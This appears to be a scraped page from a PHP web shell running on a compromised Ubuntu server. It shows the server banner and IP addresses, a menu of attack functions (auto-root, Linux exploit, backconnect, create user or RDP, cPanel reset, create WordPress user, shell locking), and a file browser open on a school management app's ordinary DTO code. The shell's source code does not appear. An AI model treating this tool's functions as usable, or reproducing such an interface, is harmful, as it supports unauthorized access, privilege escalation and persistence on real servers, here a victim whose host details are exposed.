Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sms-core /
app /
Modules /
Setting /
DTO /
[ HOME SHELL ]
Name
Size
Permission
Action
MasterEducationProgramDTO.php
1.33
KB
-rw-rw-r--
MasterEthnicGroupDTO.php
1.31
KB
-rw-rw-r--
MasterGenderDTO.php
1.21
KB
-rw-rw-r--
MasterGuardainIncomeLevelDTO.p...
1.51
KB
-rw-rw-r--
MasterGuardainProfessionDTO.ph...
1.34
KB
-rw-rw-r--
MasterGuardainRelationDTO.php
1.33
KB
-rw-rw-r--
MasterHouseDTO.php
1.42
KB
-rw-rw-r--
MasterOtherSchoolDTO.php
1.4
KB
-rw-rw-r--
MasterSpokenLanguageDTO.php
1.32
KB
-rw-rw-r--
OtherSchoolAddressDTO.php
1.72
KB
-rw-rw-r--
SystemMasterCountriesDTO.php
1.52
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : OtherSchoolAddressDTO.php
<?php namespace App\Modules\Setting\DTO; use Spatie\DataTransferObject\DataTransferObject; class OtherSchoolAddressDTO extends DataTransferObject { public int $id; public ?int $country_id = null; public ?string $zip = null; public ?string $city = null; public ?string $state = null; public ?string $district = null; public ?string $address_line_1 = null; public ?string $address_line_2 = null; public int $is_active; public string $account_uuid; public ?object $created_by_json = null; public ?object $updated_by_json = null; /** * @param other_school_addresses[] $data * @return OtherSchoolAddressDTO */ public static function collection($data) { return $data->map(function($item, $key) { return self::toJsonResponse($item); }); } /** * Transform the resource into an array. * * @param other_school_addresses{} $params * @return array */ public static function toJsonResponse($params) { return new self([ 'id' => $params->id, 'country_id' => $params->country_id, 'zip' => $params->zip, 'city' => $params->city, 'district' => $params->district, 'address_line_1' => $params->address_line_1, 'address_line_2' => $params->address_line_2, 'is_active' => $params->is_active, 'account_uuid' => $params->account_uuid, 'created_by_json' => json_decode($params->created_by_json), 'updated_by_json' => json_decode($params->updated_by_json), // 'created_at' => $params->created_at, // 'updated_at' => $params->updated_at, ]); } }
Close